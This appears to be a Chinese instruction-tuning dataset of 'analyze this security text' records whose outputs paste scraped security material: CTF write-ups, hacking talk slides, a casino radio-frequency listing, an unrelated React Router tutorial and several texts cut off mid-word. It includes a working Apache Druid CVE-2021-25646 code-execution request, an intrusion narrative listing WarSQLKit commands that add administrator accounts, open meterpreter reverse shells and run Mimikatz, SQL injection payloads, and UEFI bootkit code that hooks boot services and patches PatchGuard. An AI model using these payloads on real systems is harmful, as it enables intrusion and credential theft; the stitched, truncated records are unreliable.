{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## ISolve (PPC) ###ENG [PL](#pl-version) The task was pretty obvious: the server provides us with a regular expression and we need to supply a string which can be matched by this regex. Since we're lazy we checked if someone has not done this already, and of course they did: https://bitbucket.org/leapfrogdevelopment/rstr/ So we simply write a short parser for the communication with server, and use `xeger` to get answers. We had to modify the xeger code a bit because it was generating `\\n` in place of whitespace placeholders and the server was not handling this well, so we forced the library to use `\\t` always for `\\s`. There was also some issue with non-alphanumeric characters so we also forced those to a single chosen character. Rest was just the communication with the server: ```python import rstr import socket import re from time import sleep def recvuntil(s, pattern, tryouts): data = \"\" for i in range(tryouts): sleep(1) data += s.recv(9999) if pattern in data: return data return data def main(): url = \"hack.bckdr.in\" port = 7070 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((url, port)) while True: task = recvuntil(s, \"Pass your solution:\", 10) print(task) to_solve = re.findall(\"Your regex:\\s+(.*)\\s+Pass your solution\", task) if len(to_solve) == 0: print(task) else: print(\"to solve = '%s'\" % to_solve[0]) solution = rstr.xeger(to_solve[0]) print(\"solution = %s\" % solution) s.sendall(solution + \"\\n\") main() ``` Which gave: ``` Passed regex! Way to go. ################################ ####### ROUND 47 ##### ################################ Your regex: ab* Pass your solution: to solve = 'ab*' solution = ab Passed regex! Way to go. Congratulations, you can now say ISOLVE flag{...} ``` ###PL version Zadanie było dość oczywiste koncepcyjnie: serwer podaje nam wyrażenie regularne a my mamy zwrócić ciąg znaków, który będzie przez to wyrażenie przyjęty. Jako, że jesteśmy leniwi z natury, sprawdziliśmy czy ktoś już czegoś podobnego nie napisał i oczywiści", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nScanner Frequencies: Riviera Hotel and Casino Trunking System, Las Vegas, Nevada http://radioreference.com/modules.php?name=RR&sid=4413 1 of 2 6/18/2007 14:54 NOT LOGGED IN Home  Your Account  Forums  Database  Wiki  Submit Info Search RR Help Desk Riviera Hotel and Casino System US > Nevada > Clark County System Information Last Updated on 08-15-2006 19:04 System Name: Riviera Hotel and Casino Location: Las Vegas, NV County: Clark System Type: LTR Standard System Voice: Analog Last Updated: Changed talkgroups Hits: 502 System Frequencies Site Description 001 Confirmed LCN 01 N/A 02 N/A 03 N/A 04 N/A 05 N/A 06 N/A 07 N/A 08 462.06250 09 N/A 10 N/A 11 N/A 12 N/A 13 N/A 14 464.88750 15 N/A 16 464.93750 17 N/A 18 464.96250 002 Unconfirmed LCN 01 452.33750 System Talkgroups Updated in the last 7 days Updated in the last 24 hours All Talkgroups DEC Description 0-08-009 Security Home History Downloads NV Trunking Submit Watch Admin South Point Hotel Casino Las Vegas hotel rooms from $55. World class spa is open. Book now. Scanner Frequencies: Riviera Hotel and Casino Trunking System, Las Vegas, Nevada http://radioreference.com/modules.php?name=RR&sid=4413 2 of 2 6/18/2007 14:54 0-08-010 Supervisors (Security?) 0-08-012 Convention Porter 0-08-013 Chef 0-08-014 Audio/Visual 0-08-025 Slots? 0-08-032 Maintenance 0-08-036 Housekeeping 0-08-037 Bar Department All information here is Copyright 2006 by RadioReference.com LLC and Lindsay C. Blanton III. Please see our Privacy Policy and Terms and Conditions. South Point Hotel Casino Rooms in Las Vegas from $55. World class spa is open. Book now. www.SouthPointCasino.com Mirage Hotel Las Vegas Find hotel rooms, dining, shows & more for the Mirage Hotel Las Vegas www.LuxeVegas.com Hotel Discounts Premium Hotels and Bargain Prices. Save up to 70% on 165,000+ Hotels Hotels.SideStep.com Police Ringtone Send this ringtone to your phone right now! RingRingMobile.com", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nimport re from Crypto.Util.number import getPrime from crypto_commons.asymmetric.asymmetric import paillier_encrypt_simple, paillier_decrypt from crypto_commons.generic import long_to_bytes, bytes_to_long from crypto_commons.netcat.netcat_commons import nc, receive_until_match, send from crypto_commons.rsa.rsa_commons import modinv def command(s, data, command): send(s, command) res = receive_until_match(s, \"input: \") send(s, data.encode(\"hex\")) res = receive_until_match(s, \".*\\n\") return re.findall(\"(.*)\\s+\", res)[0] def enc(s, data): return command(s, data, 'A') def dec(s, data): return command(s, data, 'B') def recover_modulus(enc, dec, bitsize): for bit in range(bitsize - 1, -1, -1): payload = 2 ** bit e = enc(long_to_bytes(payload)).decode(\"hex\") result = dec(e) if result == '00': start_bit = bit break print('start bit', start_bit) payload = 2 ** start_bit # 100000... for bit in range(start_bit - 1, 7, -1): payload = 2 ** bit print(bin(payload)) e = enc(long_to_bytes(payload)).decode(\"hex\") result = dec(e) if result != '00': # didn't work, set the bit back payload = 2 ** bit print('almost modulus', payload) too_large = payload  0xff e = enc(long_to_bytes(too_large)).decode(\"hex\") result = int(dec(e), 16) for i in range(256): potential_n = payload  i mod = too_large % potential_n if mod == result: return potential_n def recover_flag(dec, flag, n, bitsize, known_suffix=''): f = '' divisor = modinv(2 ** 8, n) for last_byte in known_suffix[::-1]: # strip known suffix sub = paillier_encrypt_simple(n - bytes_to_long(last_byte), n + 1, n) flag = flag * sub % (n * n) flag = pow(flag, divisor, n * n) for i in range(14): last_byte = dec(long_to_bytes(flag)).decode(\"hex\") if last_byte == '': return f[::-1] + known_suffix f += last_byte print(f[::-1] + known_suffix) sub = paillier_encrypt_simple(n - bytes_to_long(last_byte), n + 1, n) flag = flag * sub % (n * n) flag = pow(flag, divisor, n * n) return f[::-1] + known_suffix def main(): bitsize = 1024 url = \"13.112.92.9\" po", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFun with SOHO Router 101 by Jhe@HITCON-CMT Who am I ?  Jhe  Co-founder of UCCU  know a little  Web security  Binary exploitation  Parseltongue (python) Firmware overview Reversing engineering Common vulnerabilities Real world case UCCU What is SOHO Router Firmware overview Reversing engineering Common vulnerabilities Real world case UCCU What is SOHO Router What is SOHO Router  Small Office / Home Office  functions  NAT, VPN, Dynamic DNS,  Port forwarding, Firewall, Wireless  DHCP, MAC filter, Remote Mgt.  Ad. block What is SOHO Router  Small Office / Home Office  functions  NAT, VPN, Dynamic DNS,  Port forwarding, Firewall, Wireless  DHCP, MAC filter, Remote Mgt.  Ad. block Firmware overview Reversing engineering Common vulnerabilities Real world case UCCU What is SOHO Router Firmware overview Two ways to debug  Hardware  JTAG, Serial / UART console   Software  Just download it from official website Firmware overview Two ways to debug  Hardware  JTAG, Serial / UART console   Software  Just download it from official website Firmware overview  File system  SquashFS, JFFS2, cramfs, YAFFS   Architecture  MIPS/MIPSEL,ARM,PPC,x86,x86-64   Bootloader Firmware overview Reversing engineering Common vulnerabilities Real world case UCCU What is SOHO Router Reversing engineering  Static analysis  firmware extraction  reversing binary (IDA Pro  )  something hardcode  open source code  known vulnerabilities Reversing engineering  Dynamic analysis  firmware extraction  run with emulator(QEMU,Gdb,IDA Pro)  port scanning  Web security testing Reversing engineering Prerequisite  binwalk  analysis, reverse engineering, extracting Reversing engineering Prerequisite  binwalk  fmk (firmware mod kit)  build firmware,unsquash,uncramfs  Reversing engineering Prerequisite  binwalk  fmk  Linux Reversing engineering Extraction Reversing engineering Extraction Reversing engineering Extraction Reversing engineering Extraction Reversing engineering Extraction Reversing engineering Extraction Som", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nLEARN HOW TO CONTROL EVERY ROOM AT A LUXURY HOTEL REMOTELY: THE DANGERS OF INSECURE HOME AUTOMATION DEPLOYMENT Jesus Molina @verifythentrust security@nomeames.com HACKING IN MOVIES The Italian Job  Seth Green takes control of all kind of public transit so the mini-coopers can run free  all I did was come up with my own... kick ass algorithm to sneak in, and now we own the place Jurassic Park  Electric fences go off, dinosaurs escape wrecking havoc. But the hacker teen fixes it later  Its a UNIX system Hack Hard  Cheap remake of Die Hard, but the hero is a hacker defeating the terrorists by taking over control of every appliance in a Chinese luxury hotel  Its a KNX system! Let me google this THE ST. REGIS SHENZHEN HOTEL IS HERE Hollywood movies vs. Art House movies  In Hollywood movies the hacker does all the job in a mere 5 sequences  In art house movies it takes a little longer. Step1: Reckon  The iPad uses the guest network Step1: Reckon  The hero needs to understand the protocol. Using ultra high tech technology intercepts communication between iPad and devices Step 2: Reverse Engineer the protocol  What is this?  UDP packets flying left and right  No idea, but connects to port 3671 Step 2: Reverse Engineer the protocol  Use advanced machine learning techniques to discover the communication protocol KNX INTERLUDE This is the part with frames of the hero reading his Kindle and researching the internets Step 2: Reverse Engineer the protocol  KNX! And a fancy plugin for wireshark  So what is KNX?  According to their webpage, KNX is the worlds only open Standard for the control in both commercial and residential buildings\". It goes on by saying KNX is therefore future proof  This communication protocol is KNX/IP, or KNX over IP KNX/IP frame Header Ethernet Header IP KNXnet/IP Header UDP Header Length Protocol Version Service Type Identifier Payload Total Length cEMI 06 10 04 20 00 15 04 49 00 00 11 00 bc e0 00 00 08 02 01 00 81 /* TUNNELLING_REQUEST */ /* Header (6 B", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# We got paged out, mr president! (forensic, misc, 973p) > We got some important data paged out. > Can you recover it? > pagefile.sys.gz > Hints: > The first key is named 'ct', the second one - 'fz'. Find out the remaining keys. This was an exercise in good Linux-fu. The file we had was 1GB large, so impossible to search by hand. Given the hint, we could deduce though that there should be `ct` and `fz` strings somewhere. Since `ct` is pretty common digraph (`action`, `direct`, and others), we decided to look for far rarer `fz`. Since this was a Windows dump, we searched for UTF-16 strings. And... done: ```bash λ strings -e l pagefile.sys | grep fz Computer\\HKEY_LOCAL_MACHINE\\SOFTWARE\\ct\\fz\\one\\{\\r3g_\\h4x\\0r} ``` The flag is `ctfzone{r3g_h4x0r}`", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Apache Druid 代码执行漏洞CVE-2021-25646 Apache Druid是一个开源的分布式数据存储 Apache Druid包括执行嵌入在各种类型请求中的用户提供的JavaScript代码的能力这个功能是为了在可信环境下使用并且默认是禁用的然而在Druid 0.20.0及以前的版本中攻击者可以通过发送一个恶意请求使Druid用内置引擎执行任意JavaScript代码而不管服务器配置如何这将导致代码和命令执行漏洞 参考链接 - <https://blogs.juniper.net/en-us/threat-research/cve-2021-25646-apache-druid-embedded-javascript-remote-code-execution> - <https://mp.weixin.qq.com/s/McAoLfyf_tgFIfGTAoRCiw> ## 漏洞环境 执行如下命令启动一个Apache Druid 0.20.0服务器 ``` docker compose up -d ``` 服务启动后访问`http://your-ip:8888`即可查看到Apache Druid主页 ## 漏洞复现 直接发送如下请求即可执行其中的JavaScript代码 ``` POST /druid/indexer/v1/sampler HTTP/1.1 Host: your-ip:8888 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36 Connection: close Cache-Control: max-age=0 Content-Type: application/json { \"type\":\"index\", \"spec\":{ \"ioConfig\":{ \"type\":\"index\", \"firehose\":{ \"type\":\"local\", \"baseDir\":\"/etc\", \"filter\":\"passwd\" } }, \"dataSchema\":{ \"dataSource\":\"test\", \"parser\":{ \"parseSpec\":{ \"format\":\"javascript\", \"timestampSpec\":{ }, \"dimensionsSpec\":{ }, \"function\":\"function(){var a = new java.util.Scanner(java.lang.Runtime.getRuntime().exec([\\\"sh\\\",\\\"-c\\\",\\\"id\\\"]).getInputStream()).useDelimiter(\\\"\\\\A\\\").next();return {timestamp:123123,test: a}}\", \"\":{ \"enabled\":\"true\" } } } } }, \"samplerConfig\":{ \"numRows\":10 } } ``` 可见`id`命令已被成功执行 ![](1.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nNISRA  王薪嘉  現任 NISRA 會長 2  靜態  只能瀏覽資料 (純粹圖文)  Html + CSS  動態  用戶端與伺服器可以互動  Ex: 投票系統檔案上傳購物網站, etc  PHP, JSP, ASP, etc 上傳 伺服器 顯示 user user user 程式 資料庫 php asp 上傳 上傳 伺服器 伺服器 顯示 輸入&產生 user user user user user user 資料隱碼攻擊  Structured Query Language一般習慣唸成 \"sequel\"不過正確的唸法應該是 \"S-Q-L\"  是一種常見於資料庫的語言用於資料存取查詢 更新和管理關聯式資料庫系統  同時也是資料庫指令檔的副檔名 (.sql)  SQL 的語法是由一些簡單的句子構成簡單易學 7  Database按照資料結構來組織存儲和管理資 料的倉庫使用者可以對檔案中的資料執行新增 更新刪除搜尋等操作 資料1 資料2 資料3 資料4 Table1 Database Table Table4 Table2    發生於應用程式之資料庫層的安全漏洞  在輸入的字串中夾帶 SQL指令若程式沒有進行檢 查而使這些字串被誤認為是合法的 SQL指令並執行 將會造成  資料竊取  資料刪除  etc  登入檢查判定 User 輸入的帳號密碼是否正確 來確定登入是否成功 10 使用者名稱 使用者密碼 Login  登入檢查判定 User 輸入的帳號密碼是否正確 來確定登入是否成功  select * from members where account='$name' and password='$password' 11  登入檢查判定 User 輸入的帳號密碼是否正確 來確定登入是否成功  select * from members where account='$name' and password='$password'  此時帳號輸入' or 1=1 /* 密碼任意輸入 12  select * from members where account ='' or 1=1 /*' and password='' 13  select * from members where account ='' or 1=1 /*' and password=''  /* 在 MySQL 語法中代表註解的意思 所以/*後面的字串通通沒有執行而這句判斷 式1=1永遠成立就能藉此登入網站成功 14  select * from members where account ='' or 1=1 /*' and password=''  /* 在 MySQL 語法中代表註解的意思 所以/*後面的字串通通沒有執行而這句判斷 式1=1永遠成立就能藉此登入網站成功  MySQL 的註解有三種/*-- # 15  DROPSQL 語法中關於刪除的指令  假如使用者輸入的地方可以執行 DROP 指令那 也許將會刪除 表格 -> DROP TABLE \"表格名稱\" 資料庫 -> DROP DATABASE \"資料庫名稱\" 16  過濾使用者的輸入' \" / ' or 1=1 /*  or 1 = 1 17  過濾使用者的輸入' \" / ' or 1=1 /*  or 1 = 1  加工使用者輸入的字串把字串中的特殊字元前加 上 \\ 再回傳 18 XSS - 跨網站指令碼 19  一種常見於 Web 應用程式中的電腦安全性漏洞  在網頁中注入惡意程式透過使用者在網路上擴散 20  Web 瀏覽器本身的設計不安全  XSS 觸發的門檻低且不受重視  Web 2.0 後網站上的交互功能日漸強大我們將有 越來越多的機會可以查看修改他人的資訊 21 反射型 & 持久型  又稱 非持久型參數型 XSS  在使用者按下時觸發  一般是透過特定手法(如E-mail) 誘使 User 連結包含惡意程式的 URL  常出現於網站的搜尋欄使用登入介面 用來竊取 Cookie 或是釣魚欺騙 23 Hacker Web 網頁 瀏覽網頁 Hackers Server 使用者資料 (Cookie) 惡意程式碼 24 E-mail USER  又稱儲存型可能會影響 Web 伺服器  先將惡意腳本上傳或儲存在有漏洞的伺服器上 只要受害者瀏覽到相關頁面就會執行惡意程式  一般出現在網站的留言板評論部落格日記等 可以用來滲透網站木馬釣魚編寫 XSS 蠕蟲 25 Server Hacker Web 留言板 惡意程式碼 瀏覽 攻擊/ 執行惡意程式 USER  尋找 可以顯示使用者輸入文字的地方  測試 是否可以執行 腳本語言 (Ex: Javascript)  植入 惡意程式 27 28", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n安全画像在58落地实践 目录 0 1 0 2 0 3 0 4 0 5 整体架构 标签生产 标签管理 落地实践 背景 背景 01 背景 背景 黑名单 维度单一力度粗 判罚依据少误杀严重 有监督算法模型 模型训练成本高 准确率衰减较快 内容识别 内容变化频繁 字体变化频繁 传统风控策略 黑产特征变化频繁 人工维护成本高 传统 风控  传统风控手段主要是基于行为和内容的拦截在对抗初期效果比较明显但随着黑产攻击行为的 不断变化问题也逐渐显现  安全画像的目标利用现有风控手段的安全治理成果持续对黑产资源进行多维度消耗提升黑产 攻击成本  传统风控系统虽然行之有效但是没有对黑产资源进行消耗 解决方案 整体架构 02 系统架构 基础数据域 用户行为数据 风控审核数据 算法模型数据 第三方数据 基础平台域 数据流转平台 规则计算引擎 特征库平台 生产域 实时标签备注系统 离线任务调度系统 门户 统一数据接入服务 标签库 名单库 查询服务 画像查询服务 综合风险分 关联分析服务 运营域 能力域 标签管理平台 策略管理后台 综合风险分平台 自动化评估平台 关联分析平台 权 限 管 理 监控预警平台 技术选型 维度结构不固定 T级数据存储 存储横向扩容 高并发低延迟 标签数据可视化管理 实时复杂标签聚合查询 离线分析 算法模型支撑 高可用 m on god b red is 高频 es HDFS 标签生产 03 多种标签生产方式 0 1 行为特征分析 0 3 黑产工具分析 0 5 历史违规数据积累 0 2 黑产情报 0 4 群体聚类模型 0 6 第三方数据校 验能力  丰富的标签生产方式 标准化流程 1 3 5 2 4 6 打标引擎 实时打标引擎 离线打标引擎 算法打标引擎 数据源配置 特征配置 策略配置 策略监控 标签任务配置 任务调度 任务监控 特征配置 样本训练 准招率评估 特征库 数据 层 业务离线数据 业务实时数据 计算 引擎 实时计算平台 流式计算平台 离线计算平台 PV计算能力 通用过滤组件 UV计算能力 滑动窗口能力 PV计算能力 UV计算能力 滚动窗口能力 PV计算能力 UV计算能力 超长窗口计算能力 原生特征 复合特征 特征 管理 特征查询 应用 层 算法模型 策略模型 黑产特征分析平台 监控预警平台 特征配置 图算法模型  标签策略繁多难于维护  准确率召回率衰减较快  人工投入成本高  传统策略分析分类算法模型  黑产批量控制账号进行各种违规行为存在资源聚集性以及行为一 致性 图算法模型 图算法模型 标签管理 04 标签管理平台 01 02 03 04 05 时效性 管理 标签字 典管理 标签清 洗 标签查 询 标签分 值体系 关联分析平台 覆盖 范围 广泛 输出 能力 多样 化 注册场景 登录场景 发布场景 支持 团伙 分析 关联维 度多 支持 层级 关联 关联分 析平台 支持设备维度身份维度 认证维度账号维度关联 支持多层关联 层级可定制 关联结果相似性分析 支持在线查询 文件导出 批量查询 自动化评估平台 准确率评估 召回率评估 样本库  自动化评估平台 落地实践 05 落地数据 16亿+ 恶意数据存量 画像数据存量 26亿+ 99%+ 准确率 120+ 接入业务场景 日调用量 300亿+ 日识别风险请求 20亿+ 服务场景 蜜罐 精准打击 处置 惩罚 样本投放 黑样本 白样本 差异化分 析 行为轨迹对比 黑白行为分析 轨迹跟踪 全路径追踪 3 60 度特征提 取 行为锁定 风险行为判定 风险实体打标 THANKS THANKS", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n问了下师傅目标有个php dz的站有一个aspx的站从aspx的读取文件读取到 web.config文件内容是sa账号但是降权了而且传不到aspx文件网站目录里面 只能传到dz的网站里面一个asp冰蝎马 用了师傅的网站看下进程(皮一下哈哈) 上次说过了iis权限就算是管理员权限都一样powershell啥的net net1肯定是没戏 的你直接穿exe也是没戏的连query user都看不了也断掉了我们传exp上去提 权 首先在aspx站找到了sa账号密码和dz的config目录里面找到了root账号i密码 主要是有的马被杀了而且由于我对sql server熟悉一点所以直接执行 之前呢因为知道 https://github.com/EPICROUTERSS/MSSQLFileless RootkitWarSQLKit 这个项目而且klion师傅说过 可以看下帮助他是有提权操作的而且是不落地的提权手法(有错误的话就当我没 说) 因为当时研究过把所有可利用的不落地文件全部都做好了 EXEC sp_cmdExec 'whoami'; => Any Windows command EXEC sp_cmdExec 'whoami /RunSystemPriv'; => Any Windows command with NT AUTHORITY EXEC sp_cmdExec '\"net user eyup P@ssw0rd1 /add\" /RunSystemPriv'; => Adding EXEC sp_cmdExec '\"net localgroup administrators eyup /add\" /RunSystemPriv' EXEC sp_cmdExec 'powershell GetChildItem /RunSystemPS'; => (Powershell) with EXEC sp_cmdExec 'sp_meterpreter_reverse_tcp LHOST LPORT GetSystem'; => x86 EXEC sp_cmdExec 'sp_x64_meterpreter_reverse_tcp LHOST LPORT GetSystem'; => EXEC sp_cmdExec 'sp_meterpreter_reverse_rc4 LHOST LPORT GetSystem'; => x86 EXEC sp_cmdExec 'sp_meterpreter_bind_tcp LPORT GetSystem'; => x86 Meterpreter EXEC sp_cmdExec 'sp_Mimikatz'; select * from WarSQLKitTemp => Get Mimikatz Log. Thnks Benjamin Delpy :) EXEC sp_cmdExec 'sp_downloadFile http://eyupcelik.com.tr/file.exe C:\\ProgramData\\fi EXEC sp_cmdExec 'sp_getSqlHash'; => Get MSSQL Hash EXEC sp_cmdExec 'sp_getProduct'; => Get Windows Product EXEC sp_cmdExec 'sp_getDatabases'; => Get Available Database 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 查看下有两个rdp会话但是都在5月底 直接利用sqldumper貌似不行死活导不出来只能换个办法了 那就只能导出注册表解密hash试试 本地读取下hash文件 administrator解密不出来但是另一个用户解密出来了登录3389的时候限制了计算 机名称 本地更改下计算机名字 直接rdp登录进来 然后也不用传文件直接sqldumper dump下来就行了 本地导入解密下", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n! ! Taie-Bugbounty-killer是什什么意思? 主要目标是分享一些更更快速的刷SRC赏金金的自动化挖洞洞技巧命令和工具协同使用里里面的方法我们能 够快速批量量找到可以被利利用的子域api令牌和其它敏敏感漏漏洞洞 摘要 之前许诺给大家的自动化赏金金挖洞洞技巧现在来了了我不不知道你们现在的挖洞洞方式是什什么我现在的挖 洞洞方式是能用老老外的一条命令自动化或者整合自动化我就不不手动挨个去信息收集可以挖掘希望这个系 列列可以给你们提供一些不不一样的挖洞洞思路路技巧 1. 心脏滴血漏漏洞洞 By: @imranparray101 Source: link 下面是一个有用的一行行命令来检查主机名列列表中是否存在OpenSSL Heartbleed漏漏洞洞: 请注意 Heartbleed CVE-2014-0160会导致服务器器内存内容泄漏漏和敏敏感信息泄漏漏 2. 使用grep提取urls By: @imranparray101 Source: link grep '-Eo' 参数将只打印匹配的行行这将使每个URL在一行行中逐一打印出来 cat list.txt | while read line ; do echo \"QUIT\" | openssl s_client -connect $line:443 2>&1 | grep 'server extension \"heartbeat\" (id=15)' || echo $line: safe; done cat file | grep -Eo \"(http|https)://[a-zA-Z0-9./?=_-]*\"* curl http://host.xx/file.js | grep -Eo \"(http|https)://[a-zA-Z0-9./?=_-]*\"* 验室制作翻译出品 3. 从APK中提取敏敏感信息 By: @MrR0Y4L3 Source: link 以下是从未打包的APK文件Android应用程序中提取有趣潜在敏敏感信息的提示: 通过这一行行程序我们可以识别urlAPI密钥身份验证令牌凭证证书锁定代码等等 请确保首先使用如下apktool解压缩APK文件: 4. 远程解压缩zip文件 By @el_vampinio Source: link 你是否发现一个可以在远程web服务器器上访问的非常大的zip文件并希望检查其内容但您不不想等待下 载它用它没毛病.. grep -EHirn \"accesskey|admin|aes|api_key|apikey|checkClientTrusted|crypt|http:|https:|passw ord|pinning|secret|SHA256|SharedPreferences|superuser|token|X509TrustManager|in sert into\" APKfolder/ apktool d app_name.apk 验室制作翻译出品 Note that for this to work, the remote web server hosting the zip file has to support the range HTTP header. 5. Top 25 开放重定向的dorks By @lutfumertceylan Source: link 下面是25个最容易易发现开放重定向漏漏洞洞\"未验证的重定向和转发\" 当URL参数payload在服务器器端没有得到正确的验证导致用户被重定向到一个任意网站时网站就 会受到Open Redirect的攻击 虽然这对用户没有任何重大的威胁但这个漏漏洞洞让网络钓鱼变得更更加容易易 6. JWT token 绕过 pip install remotezip # 列列出远程zip文件的内容 remotezip -l \"http://site/bigfile.zip\" # 从远程zip文件解压出file.txt remotezip \"http://site/bigfile.zip\" \"file.txt\" /{payload} ?next={payload} ?url={payload} ?target={payload} ?rurl={payload} ?dest={payload} ?destination={payload} ?redir={payload} ?redirect_uri={payload} ?redirect_url={payload} ?redirect={payload} /redirect/{payload} /cgi-bin/redirect.cgi?{payload} /out/{payload} /out?{pa", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## Router ### histroy 属性 histroy 来自于 es6 的 histroy 机制 Router组件里的history属性用来监听浏览器地址栏的变化并将URL解析成一个地址对象供 React Router 匹配 history属性一共可以设置三种值 - BrowserRouter - hashHistory 路由将通过URL的hash部分#切换 - createMemoryHistory 主要用于服务器渲染它创建一个内存中的history对象不与浏览器URL互动 ### BrowserRouter 浏览器的路由就不再通过`Hash`完成了而显示正常的路径`example.com/some/path`背后调用的是浏览器的History API `BrowserRouter`放在最高的级别把你需要的组件放在里面才会有`props`里的一些属性 #### 例子路由的参数传递 父组件 ```js import React from 'react' import { BrowserRouter,Route,Link } from 'react-router-dom' import Btn from './Btn' class App extends React.Component{ render(){ return( <BrowserRouter> <div className=\"app\"> <Link to='/btn'>进入Btn</Link> <Route path='/btn' component={Btn}/> </div> </BrowserRouter> ) } } export default App ``` 子组件 ```js import React from 'react' class Btn extends React.Component{ render(){ console.log(this.props) return( <div className=\"btn\"> <input type=\"button\" value='点击添加' /> </div> ) } } export default Btn ``` 在子组件的`this.props`里输出三个对象`history``location``match` #### history历史记录 **history** 它提供了多种不同的方法来管理各种环境中的JavaScript中的会话历史通过被包裹的子组件的`this.props.history`来显示 **history** 对象通常具有以下属性和方法 - length - number历史堆栈中的条目数 - action- 字符串当前动作PUSHREPLACE或POP - location - 对象当前位置可能具有以下属性 - pathname - stringURL的路径 - search - stringURL查询字符串 - hash - stringURL哈希片段 - state- 字符串位置特定的状态例如push(path, state)当该位置被推送到堆栈时仅在浏览器和内存历史记录中可用 - push(path, [state]) - function将新条目推入历史堆栈 - replace(path, [state]) - function替换历史堆栈上的当前条目 - go(n)- function通过n条目移动历史堆栈中的指针 - goBack() - 功能相当于 go(-1) 返回刚才的界面 - goForward() - 功能相当于 go(1) 前进一步 - block(prompt)- 功能防止导航请参阅历史文档 #### location位置 `location`对象代表了应用程序现在的位置 **location的属性和方法** - hash哈希值 - keykey值 - pathname地址 - search查询地址 - statestate是一个对象通过里面的from来写入一个地址 #### match路由匹配 一个`match`对象包含有关如何信息<Route path>相匹配的URL **match对象的属性** - params对象从与路径的动态段相对应的URL分析密钥/值对 - isExact布尔值true如果整个URL匹配没有尾随字符 - pathstring用于匹配的路径模式有用建设嵌套<Route>小号 - urlstringURL的匹配部分有用建设嵌套<Link>小号 ### withRouter 如果想用`router`的方法而组件没有在路由上所以用`withRouter`去包装 ```js import React from 'react'", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMBR Bootkit不在叙述写这个的还是比较多的UEFI Bootkit相较于MBR Bootkit从某种意义上来说开发 要更为方便因为UEFI具有统一规范可以直接使用C/C++上手开发 在正式介绍前先来简单说一下UEFI下Windows启动过程 1. 基本过程如下 PC开机,加电自检固件UEFI加载执行,初始化硬件 2. 固件UEFI根据启动项从EFI分区中加载并启动 \\EFI\\Microsoft\\boot\\bootmgfw.efi Windows boot manager 3. bootmgfw.efi加载启动Winload.efiWindows Os loader 4. Winload.efi加载执行Ntoskrnl.exe并将控制权移交给操作系统 我们此次开发的Bootkit从第二步入手直接替换bootmgfw.efi为我们的loader这个loader只有一个功 能执行我们的UEFI驱动我们的UEFI驱动在后门环境部署完成后回去加载执行原始的bootmgfw.efi进入 正常的Windows引导流程我们以上内容皆在Secure Boot关闭状态下为前提如果Secure Boot开启会 在执行我们的loader的时候就卡死因为签名校验不过 UEFI驱动入口点如下 EFI_STATUS EFIAPI UefiMain(EFI_HANDLE ImageHandle, EFI_SYSTEM_TABLE* SystemTable) { EFI_STATUS status; //CalculateCrc32 originalExitBootServices = gBS->ExitBootServices; gBS->ExitBootServices = HookExitBootServices; //注册事件回调在os loader 调用SetVirtualAddressMap时通知我们 //根据Edk2文档可以选用CreateEventEx配合gEfiEventVirtualAddressChangeGuid或 EVT_SIGNAL_VIRTUAL_ADDRESS_CHANGE //SetVirtualAddressMapEvent 我们首先HOOK掉ExitBootServices因为此处是一个关键函数 在Winload.efi中会对这个函数进行调用此函数的作用是结束启动服务EFI Boot Service标志着操 作系统已经准备就绪官方文档 我们HOOK这里的目的是为了寻找被加载到内存中的ntoskrnl为了寻找到ntoskrnl我们需要先找到 LOADER_PARAMETER_BLOCK这个结构体存储着所有的模块信息具体请参照OslLoaderBlock函数 找到之后我们就可以开始遍历 status = gBS->CreateEvent(EVT_SIGNAL_VIRTUAL_ADDRESS_CHANGE, TPL_NOTIFY, NotifySetVirtualAddressMap, NULL, &virtualEvent); if (status != EFI_SUCCESS) { DebugPrint(L\"CreateEvent err\"); } EFI_DEVICE_PATH* BootmgfwPath; EFI_HANDLE BootmgfwImageHandle; //转换路径 UtilLocateFile(BootmgfwDiskPath, &BootmgfwPath); //加载bootmgfw.efi status = gBS->LoadImage(TRUE, ImageHandle, BootmgfwPath, NULL, 0, &BootmgfwImageHandle); if (status != EFI_SUCCESS) { DebugPrint(L\"LoadImage No bootmgfw.efi\"); } //启动 status = gBS->StartImage(BootmgfwImageHandle, 0, 0); return status; } 随后搜索内核中的KeInitAmd64SpecificState函数这个是PG初始化执行的函数我们需要对它进行修补 继续搜索StartFirstUserProcess函数这函数在内核中负责启动SMSS进程但是我们并不能在这里直接 HOOK它因为此时我们还处在物理地址而StartFirstUserProcess函数在保护模式是虚拟地址等会系统 启动我们需要转换后才能HOOK我们这里只记录一下函数地址 在UefiMain函数中我们曾设置了一个回调函数NotifySetVirtualAddressMap当os loader调用 SetVirtua", "category": "text_analysis", "source": "security_papers"}
